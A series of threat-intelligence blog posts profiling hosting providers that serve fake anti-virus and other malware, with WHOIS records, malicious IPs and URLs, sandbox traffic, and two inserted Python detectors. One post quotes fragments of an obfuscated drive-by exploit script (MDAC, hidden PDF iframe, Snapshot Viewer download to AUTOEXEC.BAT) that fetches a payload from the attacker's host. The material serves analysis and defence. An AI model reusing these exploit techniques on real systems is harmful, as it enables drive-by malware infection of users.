Moving Hosts
I have decided to change web hosts in order to provide a better experience to my readers and to re-brand the blog under my own name. I started this blog with a wordpress.com account as a trial, and I’ve been very pleasantly surprised by the feedback and interest the blog has received. So, to get more flexibility, I’ve moved to a proper web host. The blog will be in a bit of a state of flux as I transition to http://www.martinsecurity.net. Stay tuned.
Posted in Uncategorized
Social Security Awards
Traveling has been keeping me pretty out of the loop, but I happened to stumble on the Social Security Awards contest where the winner will be announced at the RSA conference this year. Needless to say, I would appreciate your votes in the Best Technical Security Blog area.
Vote here: http://www.socialsecurityawards.com/
I shall resume regular updates in May upon my return!
Posted in Uncategorized
Mobile Device Forensics
While catching up on security news in an internet cafe in Buenos Aires, I came upon the news that the newly elected US president Barack Obama is going to be the first president to use a BlackBerry.
Article http://blog.wired.com/business/2009/01/obama-gets-to-k.html
With there being some buzz around BlackBerry security, it’s a good time to mention the paper I wrote for SANS on mobile device forensics.
It can be found at: http://www.sans.org/reading_room/whitepapers/forensics/mobile_device_forensics_32888?show=32888.php&cat=forensics
The paper covers how to investigate a cellular phone (Motorola Razr), a smartphone (BlackBerry) and an MP3 player to gather information, recover deleted data, etc.
Posted in Forensics
Taking some time off
Since we normally only live once, I’ve decided to take an extended vacation. Thankfully my employer has been kind enough to let me take a four-month leave of absence. I’ll be using the time to learn Spanish in Buenos Aires and then continue traveling through South and Central America.
Maybe I’ll post some photos along the way to make all my readers jealous.
Happy hunting,
RealSecurity
Posted in Uncategorized
Sources of Badness – Still Trade LTD
The absolute worst culprit that I’ve come across so far in terms of bad IPs is Still Trade LTD from Russia. They have their own /24, AS47486. Out of 34 web servers in their IP block, 30 are bad. Spamhaus has the block blacklisted as a source of crimeware, see their report here.
person: Perevitskiy Sergey
address: Russian Federation,
address: St. Petersburg, Fedosenko st, 30 liter A, 24-N
mnt-by: STILLTRADE-MNT
abuse-mailbox: abuse@still-trade.com
e-mail: perevitzky.sergey@still-trade.com
phone: +7 (960) 257-87-90
nic-hdl: PERE1-RIPE
changed: lexa@wahome.ru 20080624
source: RIPE
Still Trade hosts a ton of fake/rogue anti-virus domains and applications. We’ve seen these hosts pop up recently:
91.208.0.220
2008-12-01
scanner.rapidantivirus.com /setup/setup.exe – Fake AV
Trojan:Win32/FakePowav
FraudTool.Win32.ExtraAntivir.c
Win32/FakeAV!generic
91.208.0.221
2008-12-11
myprivatetubes09.net /cd/650/1749/wmpcdcs.exe – Zlob
DR/Zlob.Gen
TrojanDownloader:Win32/Renos.HB
Mal/Emogen-G
91.208.0.253
2008-12-03
myprivatetubes2009.net /cd/650/1663/wmpcdcs.exe – Zlob
Same as above
The following IPs are associated with malicious applications:
BISS also has a comprehensive list of domains and malware being served by these guys.
Sources of Badness – Starline Web Services
Next up, we have Starline Web Services, based in Estonia. Starline was recently in the news for briefly hosting a Srizbi C&C, as reported by FireEye.
inetnum: 92.62.101.0 - 92.62.101.255
netname: STARLINE_EE
descr: Starline Web Services
country: EE
admin-c: VN268-RIPE
tech-c: VN268-RIPE
status: ASSIGNED PA
mnt-by: AS39823-MNT
changed: roman@compic.ee 20080403
e-mail: info@starline.ee
abuse-mailbox: abuse@starline.ee
source: RIPE
The Yahoo article has lots of great information on the relationship between Starline and its upstream providers, so I won’t delve into that here.
Here are the hits I’ve seen from their IP space:
92.62.100.0 – 92.62.101.255
92.62.100.68
2008-11-05
plotfive.cn /load.php
2008-11-12 /cache/doc.pdf
2008-11-22 /cache/doc.pdf
92.62.101.13
2008-10-24
tgspk.cn /zpl/pdf.php
92.62.101.53
2008-10-30
blufda.com /eez3a893/spl/pdf.pdf
2008-11-26 /u8899r5v/spl/pdf.pdf
/u8899r5v/exe.php
2008-12-17
kraspa.com /yg6cv7ar/spl/pdf.pdf
92.62.100.44
2008-09-18
92.62.100.44 /1/
/2/
92.62.100.43
2008-09-17
92.62.100.43 /1/
/2/
There’s quite a history here. From the looks of things, someone has been moving their malware around from domain to domain on 92.62.101.53. All of these sites are down as of this writing except kraspa.com. Let’s dive further into this site.
The first page I saw was kraspa.com /yg6cv7ar/spl/pdf.pdf; however, this is not the whole story. When investigating that exact URL, pdf.pdf is not found. This is curious, as I saw the site earlier today. Backing up to the root of kraspa.com, we get an index page. The index page contains an iframe that points to a different directory. The malware author must have coded his site to rotate directory names based on certain criteria. This makes investigation difficult if you can’t figure out where it will send victims to next.
The next iframe I got contained:
src="/ov9632l9/index.php"
The next page that comes into play is the exploit script index.php, which is detected as:
Trojan-Downloader.JS.Psyme.alv
Decoding the obfuscation reveals exploits for MDAC, Adobe Acrobat and the Microsoft Access Snapshot Viewer. Here’s some of the script:
var p_url = "http://kraspa.com/ov9632l9/ztt.php";
function MDAC(){
// the word "object" is assembled one fragment at a time around an empty string to hide the keyword
var nuc='';
d8= 0;
var koSZV = document.createElement("o"+nuc+"b"+nuc+"je"+nuc+"c"+nuc+"t");
koSZV.setAttribute("id","<"+nuc+"?=k"+nuc+"o"+nuc+"S"+nuc+"ZV?"+nuc+">");
[....]
function PDF()
{
// hidden 1x1 iframe pulls in the malicious PDF (Adobe Acrobat exploit)
document.write('<iframe src="spl/pdf.pdf" width=1 height=1 style="display:none"></iframe>');
[....]
function SS()
{
// Access Snapshot Viewer ActiveX control: fetches p_url and writes it to a local path
var arbitrary_file = p_url;
var dest = 'C:/AUTOEXEC.BAT';
document.write("<object classid='clsid:F0E42D60-368C-11D0-AD81-00A0C90DC8D9' id='attack'></object>");
[....]
if (MDAC()||PDF()||SS()) { }
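The split-string trick and the hidden iframe above are easy to key detections on once the concatenation is undone. The Python below is an added example, not code from the post or from the site’s author: it drops empty-string variables out of the concatenation chain, merges the adjacent literals, and then reports the indicators the post calls out (the rebuilt createElement("object"), the 1x1 hidden iframe, the Snapshot Viewer CLSID, and the AUTOEXEC.BAT target). The script it scans is a constructed sample modelled on the excerpt, with a placeholder host.

```python
import re

# Snapshot Viewer ActiveX control CLSID quoted in the captured script above.
SNAPSHOT_VIEWER_CLSID = "F0E42D60-368C-11D0-AD81-00A0C90DC8D9"

# Constructed sample modelled on the excerpt in the post (placeholder host, not a live capture).
SAMPLE = r'''
var p_url = "http://landing.example.invalid/ov9632l9/ztt.php";
function MDAC(){
var nuc='';
var koSZV = document.createElement("o"+nuc+"b"+nuc+"je"+nuc+"c"+nuc+"t");
}
function PDF(){
document.write('<iframe src="spl/pdf.pdf" width=1 height=1 style="display:none"></iframe>');
}
function SS(){
var dest = 'C:/AUTOEXEC.BAT';
document.write("<object classid='clsid:F0E42D60-368C-11D0-AD81-00A0C90DC8D9' id='attack'></object>");
}
'''

# Two adjacent quote-delimited literals joined by '+' (no nested quotes inside either).
_LITERAL_PAIR = re.compile(r"""(["'])([^"']*)\1\s*\+\s*(["'])([^"']*)\3""")

def collapse_concat(js):
    """Undo the "o"+nuc+"b"+... trick: remove variables initialised to the empty
    string from the concatenation chain, then merge adjacent string literals
    joined by '+' until nothing changes."""
    for name in re.findall(r"""var\s+(\w+)\s*=\s*(?:''|"")\s*;""", js):
        js = re.sub(r"\+\s*%s\s*\+" % re.escape(name), "+", js)
    while True:
        merged = _LITERAL_PAIR.sub(lambda m: '"%s%s"' % (m.group(2), m.group(4)), js)
        if merged == js:
            return js
        js = merged

def scan_landing_page(script):
    """Return the names of the indicators found after de-obfuscation, in a fixed order."""
    js = collapse_concat(script)
    findings = []
    if re.search(r'createElement\("object"\)', js):
        findings.append("split-string createElement(object)")
    if re.search(r"<iframe[^>]*(width=1\b|height=1\b|display:\s*none)", js, re.I):
        findings.append("hidden iframe")
    if SNAPSHOT_VIEWER_CLSID.lower() in js.lower():
        findings.append("snapshot viewer clsid")
    if "AUTOEXEC.BAT" in js.upper():
        findings.append("autoexec.bat target")
    return findings

if __name__ == "__main__":
    print(scan_landing_page(SAMPLE))
```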
Detections for the malicious pdf:
The payload is a file called ztt.php; here are a few of the detections:
Trojan.Win32.Delf.gpg
Troj/Dloadr-BZT
Trojan.Win32.Delf.fyl
A quick submission to ThreatExpert (report) and Anubis (report) reveals further binaries that are downloaded. The .dat files are not exes, but some type of binary data file.
From ANUBIS:1033 to 92.62.101.53:80 – [kraspa.com]
Request: GET /flo/zro.dat
Response: 200 "OK"
Request: GET /flo/mp.dat
Response: 200 "OK"
Request: GET /flo/3rkour.dat
Response: 200 "OK"
Of particular interest is 79.143.177.43, another Latvian host with a small /24 network. Might be worth keeping your eyes open for them too.
inetnum: 79.143.177.0 - 79.143.177.255
netname: VDHOST
descr: VDHost network
org: ORG-Vs27-RIPE
country: LV
admin-c: CINA1-RIPE
tech-c: CINA1-RIPE
status: ASSIGNED PA
mnt-by: IT9812-MNT
From ANUBIS:1036 to 79.143.177.43:80 – [79.143.177.43]
Request: GET /myfiles/95/139/file.exe
Response: 200 "OK"
From ANUBIS:1037 to 210.83.85.100:80 – [orzsys.cc]
Request: GET /files/20026.exe
Response: 200 "OK"
Some detections for 20026.exe and file.exe:
BDS/Hupigon.Gen
Trojan.FakeAlert.Gen!Pac.2
Trojan.Crypt.LooksLike.XPACK
Trojan.FakeAlert.Gen!Pac.2
The FakeAlert signatures are correct; the threat ultimately installs some fake anti-virus / anti-spyware application.
Sources of Badness – PortNAP
One of the smaller hosts I’ve identified is PortNAP Internet Services. They appear to get their service from Grafix Internet B.V. We’ve seen fake anti-virus coming from three of their IPs in two different /24 subnets registered to PortNAP (84.243.196.0 – 84.243.197.255).
inetnum: 84.243.197.0 - 84.243.197.255
netname: GFX-CUST-PORTNAP
descr: PortNAP Internet Services
org: ORG-PIS13-RIPE
country: NL
admin-c: GFX-RIPE
tech-c: GFX-RIPE
status: ASSIGNED PA
mnt-by: GFX-MNT
changed: noc@grafix.nl 20081021
source: RIPE
abuse-mailbox: abuse@grafix.nl
84.243.196.136 2008-12-02 – site down
pro-scanner-online.com /2009/download/trial/A9installer_880473.exe
84.243.196.137 2008-12-02 – site down
protected-downloads.com /download/trial/AV360Install_77014205.exe
84.243.197.183 2008-11-20 – site down
protection-livescan.com /2009/download/trial/A9installer_880290.exe
Sources of Badness – ZlKon
After a weekend hiatus, I’m back with the next host of interest – ZlKon.
role: ZlKon HostMaster
address: Lilijas iela 4-74
address: Riga, LV-1055
address: Latvija
phone: +371 26330593
e-mail: hostmaster@zlkon.lv
admin-c: AD5952-RIPE
tech-c: AD5952-RIPE
nic-hdl: ZK508-RIPE
mnt-by: ZLKON-MNT
changed: hostmaster@zlkon.lv 20081125
source: RIPE
abuse-mailbox: abuse@zlkon.lv
Based in Latvia, Zlkon seems to have a high ratio of bad IPs to its small address space. A customer of the larger DATORU EXPRESS SERVISS, Zlkon has two /24s (94.247.2.0 – 94.247.3.255).
% Information related to '94.247.0.0/21AS12553'
route: 94.247.0.0/21
descr: "DATORU EXPRESS SERVISS" Ltd.
origin: AS12553
mnt-by: PCEXPRESS-MNT
changed: igors@pcexpress.lv 20081121
source: RIPE
94.247.2.11
2008-12-02 – not accessible
pro-scanner-online.com /2009/download/trial/A9installer_880135.exe
94.247.2.183
2008-12-09
fire-movie.com /download/Keygen.Image.for.DOS.2.08c3098.exe
Win32:Fabot
Trojan:Win32/Alureon.gen!J
Worm/AutoRun.ER
2008-12-02
spacekeys.net /download/windows311megaupload_3019.exe
Same as fire-movie.net above
2008-12-12
moonmovie.net /download/moonmovie.v.3.484.exe
Same as fire-movie.net above
94.247.2.215
2008-11-27 – not accessible
antivirus–plus.com /installer_00004.exe
94.247.2.222
2008-12-02 – not accessible
pro-scanner-online.com/2009/download/trial/A9installer_880147.exe
94.247.3.228
2008-12-02 – not accessible
pro-scanner-online.com/2009/download/trial/A9installer_880473.exe
2008-12-12
get-frsh-files.com /MCLiteodecVer.6.20467.exe
Same as files-upload.21.com below
2008-12-13
files-upload-21.com /MCLiteodecVer.6.20271.exe
TrojanDownloader:Win32/Renos.FH
94.247.2.231
2008-12-03 – not accessible
pro-scanner-online.com /2009/download/trial/A9installer_880147.exe
94.247.3.232
2008-12-14
codecdownload.3d-softwareportal.com /exclusivemovie.1518.exe
TrojanDownloader:Win32/Renos.FU
Trojan.Win32.Undef.uhx
So we’ve got some fake anti-virus, Renos, Zlob, etc. Nothing overly terrible like a banking trojan or spam bot, but who knows what else is being hosted in Zlkon’s address space.
Posted in Intelligence, Intrusion Detection, Malware Binaries (exe/dll) | Tags: fake av, malware, renos, zlkon
Sources of Badness – UATelecom
The next source of badness I’ll cover is UATelecom (AS44997). With a /22, this host is much smaller than LeaseWeb. A Swiss blogger also had a run-in with this host, which you can read about here (written in German).
91.203.92.0/22
AS44997
netname: BASTION-NET
descr: ISP UATelecom
country: EU
organisation: ORG-TG39-RIPE
org-name: UATELECOM LLC.
org-type: OTHER
address: Ukraine, Voznesensk, Lenina 52
remarks: ————————-
phone: +38-048-701-05-45
phone: +38-096-380-13-21
phone: +38-096-380-13-26
fax-no: +38-048-701-05-45
remarks: ————————-
e-mail: ipadmin@uatelecom.com.ua
abuse-mailbox: abuse@uatelecom.com.ua
We’ve seen lots of malware from their netblock:
91.203.92.138 2008-10-30 – site down
91.203.92.138 /mix/xcvb.pdf
91.203.92.47 2008-12-09 – site down
advancedscanner.com /2009/download/trial/InstallAVv_880460.exe
91.203.93.25 2008-12-02
softwareformyvideo.com /get/1xxx5912940/download.exe
Trojan-Dropper.Win32.Agent.abiq
TrojanDownloader:Win32/Renos.FS
Troj/Zlob-AOX
91.203.93.26 2008-12-02
91.203.93.26 /WinDefender2009.exe – fake AV
FraudTool.Win32.WinDefender.g
AntiVirus2008.AIJ
91.203.93.29 2008-12-03 (more on this below)
easywebsiteauditor.ru /spl/load.php – SPAM Bot
Troj/Pushdo-G
TrojanDownloader:Win32/Cutwail.S
Trojan.Win32.Small.yrx
load.php (an exe) is downloaded from the index of /spl/. The exploit code has 2/38 detections, JS:Packed-X.
91.203.93.68 2008-12-03 – site down
pcantivirusscan.com /2009/download/trial/A9installertest_880135.exe
91.203.93.81 2008-11-27 - sites down
codecdownload.x-softportal.com /k-codec.335.exe
2008-12-02 codecdownload.friendlysoftportal.com /moviecodec.91.exe
2008-12-04 codecdownload.allfilesherefordownload.com /moviecodec.136.exe
Since easywebsiteauditor.ru drops a SPAM bot, I decided to dig a little deeper. When infected, the bot first calls home via a GET to 174.36.201.82.
OrgName: SoftLayer Technologies Inc.
OrgID: SOFTL
Address: 1950 N Stemmons Freeway
City: Dallas
StateProv: TX
PostalCode: 75207
Country: US
GET /40E80014303030303030303030303030303030303030313 06C000001A366000000007600000642EB00053098A9B3BE HTTP/1.0
HTTP/1.0 200 OK
Date: Fri, 12 Dec 2008 16:10:22 GMT
Server: Apache/2.2.3 (Debian) PHP/5.2.0-8+etch9
Last-Modified: Fri, 12 Dec 2008 16:10:22 GMT
Cache-Control: no-cache
Content-Length: 110604
Connection: close
Content-Type: application/octet-stream
The stream contains some sort of obfuscated payload. The bot then makes a bunch of DNS requests to various SMTP servers and starts to send spam. There is also a side channel of some sort that it establishes to 69.46.20.65 over port 2065.
OrgName: HIVELOCITY VENTURES CORP
OrgID: HVC-3
Address: 400 N Tampa St
Address: #1025
City: Tampa
StateProv: FL
PostalCode: 33602
Country: US
This traffic also seems obfuscated with the only readable string below:
L…..9ifnospam.0.exe_url..exe_url……..
From doing a little digging, this threat really is Pushdo/Cutwail. It’s interesting that the exploit site is hosted in the Ukraine, but the C&Cs are located in the US.
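The check-in traffic above has a recognisable shape that a proxy or flow log can be screened for. The Python below is an added example, not code from the post: it flags a GET to a bare IP whose path is one long run of hex digits and whose reply is application/octet-stream with Cache-Control: no-cache, and separately flags a non-HTTP connection to port 2065. The log layout, the 32-digit threshold and the sample records are constructed (the hex path is abbreviated from the post’s capture).

```python
import ipaddress
import re

# Heuristics taken from the Pushdo/Cutwail check-in described above. The
# 32-hex-digit threshold and the flow-record layout below are assumptions.
HEX_PATH = re.compile(r"^/[0-9A-Fa-f]{32,}$")
SIDE_CHANNEL_PORTS = {2065}

# Constructed flow records, one per line: host port method path content-type cache-control
# ("-" where no HTTP exchange was observed on the connection).
SAMPLE_LOG = """\
174.36.201.82 80 GET /40E80014303030303030303030303030303031306C0000001A366000000007600000642EB00053098A9B3BE application/octet-stream no-cache
www.example.invalid 80 GET /index.html text/html max-age=3600
69.46.20.65 2065 - - - -
"""

def is_bare_ip(host):
    """True when the Host is a literal IPv4/IPv6 address rather than a name."""
    try:
        ipaddress.ip_address(host)
        return True
    except ValueError:
        return False

def parse(line):
    host, port, method, path, ctype, cache = line.split()
    return {"host": host, "port": int(port), "method": method,
            "path": path, "ctype": ctype, "cache": cache}

def classify(rec):
    """Verdict for one record, or None when neither heuristic matches."""
    if rec["port"] in SIDE_CHANNEL_PORTS and rec["method"] == "-":
        return "spambot side channel (non-HTTP on %d)" % rec["port"]
    if (rec["method"] == "GET" and is_bare_ip(rec["host"])
            and HEX_PATH.match(rec["path"])
            and rec["ctype"] == "application/octet-stream"
            and rec["cache"] == "no-cache"):
        return "pushdo-style check-in (hex path, octet-stream payload)"
    return None

def scan(log):
    """Return (host, verdict) for every record that matches a heuristic."""
    hits = []
    for line in log.splitlines():
        rec = parse(line)
        verdict = classify(rec)
        if verdict:
            hits.append((rec["host"], verdict))
    return hits

if __name__ == "__main__":
    for host, verdict in scan(SAMPLE_LOG):
        print(host, verdict)
```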
Fireeye article
Secure Works article
Happy hunting!
Sources of Badness – LeaseWeb
**Edit 2**
I’d like to thank LeaseWeb for taking the time to respond to this post. It’s great to hear that they take action quickly once informed of abuse. I found it surprising that they would receive reports of malware and other nefarious activity but with no substantiating evidence. The “fire and forget” mentality of notifying hosts is not effective. If more organizations would take the time to investigate the sites attacking them and provide detailed evidence, the whole community would prosper.
**Edit** Seems this post has already drummed up some interest from several parties.
Let me just start by saying that I am not advocating that any of the hosts discussed here be knocked off the internet. Some people are all for shutting down hosting providers that host a lot of malware, others are not. The aim of this series of posts is to inform the public that there are some other hosts out there worth taking a look at.
Is all of LeaseWeb’s /16 AS bad? Of course not. Do they have a bunch of nefarious customers purchasing service from them? It certainly looks that way; I’m sure policing such a large address space has its challenges.
The more people that know where the badness comes from, the better. If there is a case to take down a host, that case comes from the community.
Given the recent interest in web hosts such as McColo and the success that security researchers have achieved in taking them down, I decided to look for others. Over the next several days I will post details on some shady web hosts from various parts of the world. This is by no means a definitive list; it is just a start. Hopefully others in the community will go check their logs/IDS and find more information.
If I had more hosts, maybe I could call this series of articles “The week of shady web hosts”.
Today’s host is AS16265 LeaseWeb AS Amsterdam, Netherlands.
netname: LEASEWEB
descr: LeaseWeb
descr: P.O. Box 93054
descr: 1090BB AMSTERDAM
descr: Netherlands
descr: www.leaseweb.com
remarks: Please send email to "abuse@leaseweb.com" for complaints
remarks: regarding portscans, DoS attacks and spam.
remarks: INFRA-AW
country: NL
admin-c: LSW1-RIPE
tech-c: LSW1-RIPE
status: ASSIGNED PA
mnt-by: OCOM-MNT
changed: ripe@leaseweb.com 20071015
source: RIPE

Information related to '85.17.0.0/16AS16265'
route: 85.17.0.0/16
descr: LEASEWEB
origin: AS16265
remarks: LeaseWeb
mnt-by: OCOM-MNT
changed: ripe@ocom.com 20050311
changed: ripe@ocom.com 20070610
source: RIPE
We’ve got exploits and hostile payloads from several IPs in their ranges.
I haven’t had a chance to get virus total results however.
85.17.212.0 - 85.17.212.255
85.17.162.0 - 85.17.162.255
85.17.189.0 - 85.17.189.255
85.17.238.0 - 85.17.238.255
| IP | Date | Domain/IP | URL |
| --- | --- | --- | --- |
| 85.17.162.100 | 2008-12-08 | ad-adnet.net | /xrun.tmp (exe payload) |
| | 2008-11-06 | infonews.ath.cx | /data.pdf (exploit) |
| 85.17.212.137 | 2008-12-01 | www.golfinau.com | /stat/index.htm (exploit) |
| 85.17.212.134 | 2008-12-09 | securefilecourier.com | /downloadsetupws.php (exe payload) |
| 85.17.189.153 | 2008-10-14 | www.zifirgad.info | /n_fia/pdf.php (exploit) |
| 85.17.238.144 | 2008-12-03 | 85.17.238.144 | /74812/a.php (exe payload) |
Xentronix network (LeaseWeb)
85.17.166.128 - 85.17.166.255

| IP | Date | Domain/IP | URL |
| --- | --- | --- | --- |
| 85.17.166.139 | 2008-11-05 | 85.17.166.139 | /css/pdf.php (exploit) |
| 85.17.166.229 | 2008-09-19 | 85.17.166.229 | /gtest2/pdf.php (exploit) |
| 85.17.166.231 | 2008-10-15 | 85.17.166.231 | /gtest2/pdf.php (exploit) |
Posted in Intelligence, Intrusion Detection, Malware Binaries (exe/dll) | Tags: exploits, leaseweb, malware
